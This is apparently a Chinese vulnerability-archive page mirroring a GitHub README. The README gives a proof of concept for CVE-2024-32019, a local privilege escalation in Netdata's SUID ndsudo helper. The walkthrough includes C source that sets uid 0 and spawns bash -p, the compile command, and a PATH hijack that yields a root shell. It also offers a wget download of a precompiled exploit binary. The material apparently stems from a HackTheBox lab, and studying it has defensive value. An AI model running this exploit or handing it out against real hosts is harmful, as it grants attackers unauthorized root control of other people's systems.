漏洞平台

POC详情： f045e1879a0473dd4c8b3eb4502a450f08259470

来源

https://github.com/juanbelin/CVE-2024-32019-POC

关联漏洞

标题： Netdata 安全漏洞 (CVE-2024-32019)
描述：Netdata是Netdata开源的一个高保真基础设施监控和故障排除应用程序。 Netdata存在安全漏洞。攻击者利用该漏洞以 root 权限运行任意程序。

描述

Netdata ndsudo local privilage escalation workflow and POC (CVE-2024-32019)

介绍

# CVE-2024-32019-POC
Netdata ndsudo local privilage escalation workflow and POC  (CVE-2024-32019)

- [Workflow](#workflow)
- [Automatic exploit](#automatic-exploit)
- [Resources](#resources)

## Workflow
> [!TIP]
> Please read

Netdata is a tool that provides apps and systems monitoring, it runs at port 19999, easy to find:

```shell
test@test:~$ netstat -tuln
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State     

tcp        0      0 127.0.0.1:19999         0.0.0.0:*               LISTEN  
```

This vulnerability (CVE-2024-32019) **affects** the next versions: `>= v1.45.0, < v1.45.3, >= v1.44.0-60, < v1.45.0-169`. We can make a petition in order to know the version en the Header Reponse: 

<img width="605" height="289" alt="CVE-2024-32019-1" src="https://github.com/user-attachments/assets/121b7527-1c0b-4564-abd9-1b663bfe94f8" />


The exploit occurs by leverage a **PATH Hijacking** of one of their plugins, `ndsudo` which is often located in `/opt/netdata/usr/libexec/netdata/` and which has SUID. 

```shell
test@test:~$ find / -name ndsudo 2> /dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
```

<img width="1064" height="51" alt="CVE-2024-32019-2" src="https://github.com/user-attachments/assets/3bfa95c7-614c-48a9-b95f-267ebf26475c" />


We can see what we can do using `--help`

```shell
$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo --help

ndsudo

(C) Netdata Inc.

A helper to allow Netdata run privileged commands.

  --test
    print the generated command that will be run, without running it.

  --help
    print this message.

The following commands are supported:

- Command    : nvme-list
  Executables: nvme 
  Parameters : list --output-format=json

- Command    : nvme-smart-log
  Executables: nvme 
  Parameters : smart-log {{device}} --output-format=json

- Command    : megacli-disk-info
  Executables: megacli MegaCli 
  Parameters : -LDPDInfo -aAll -NoLog

- Command    : megacli-battery-info
  Executables: megacli MegaCli 
  Parameters : -AdpBbuCmd -aAll -NoLog

- Command    : arcconf-ld-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 LD

- Command    : arcconf-pd-info
  Executables: arcconf 
  Parameters : GETCONFIG 1 PD

The program searches for executables in the system path.

Variables given as {{variable}} are expected on the command line as:
  --variable VALUE

VALUE can include space, A-Z, a-z, 0-9, _, -, /, and .
```

```shell
test@test:~$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info
arcconf : not available in PATH.
```

As we can see, since the script contains several commands to choose that will look for an executable, we can leverage this in order to make our own executable named as one of the executables within a path we can add to the PATH environment variable.  

Netdata use `C`, in consequence, we have to make our script in C and compile it. 

<img width="1127" height="1157" alt="CVE-2024-32019" src="https://github.com/user-attachments/assets/5b9ca43a-3bf4-4158-ae04-956acbce4660" />


```shell
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", "-p", NULL);
    perror("execl");
    return 1;
}
```

```shell
gcc arcconf.c -o arcconf
```

Then as previously discussed, we add the script's path to the $PATH

```shell
test@test:/tmp$ PATH=/tmp:$PATH
```


Finally we simply execute the command that is pointing to our malicious executable (`arcconf-pd-info -> arcconf `) and it is going to give us a privilege shell 
```shell
test@test:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-pd-info
root@editor:/tmp# whoami
root
```

## Automatic exploit 

You can download the already compiled C malicious script that will give you a bash as root as mentioned in the example above:

```shell
wget https://github.com/juanbelin/CVE-2024-32019-POC/raw/refs/heads/main/arcconf 
```

```shell
mv arcconf /tmp #If your target has Internet connectivity

scp ./arcconf test@test:/tmp/arcconf #If your target does not have Internet connectivity
```

```shell
PATH=:/temp:$PATH
```

```shell
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo arcconf-ld-info #The ndsudo path may change 
```


## Resources 

- https://learn.netdata.cloud/docs/collecting-metrics/

- https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93

- https://app.hackthebox.com/machines/684

文件快照


 [4.0K]  /data/pocs/f045e1879a0473dd4c8b3eb4502a450f08259470
├── [ 15K]  arcconf
├── [400K]  CVE-2024-32019.pdf
└── [4.3K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。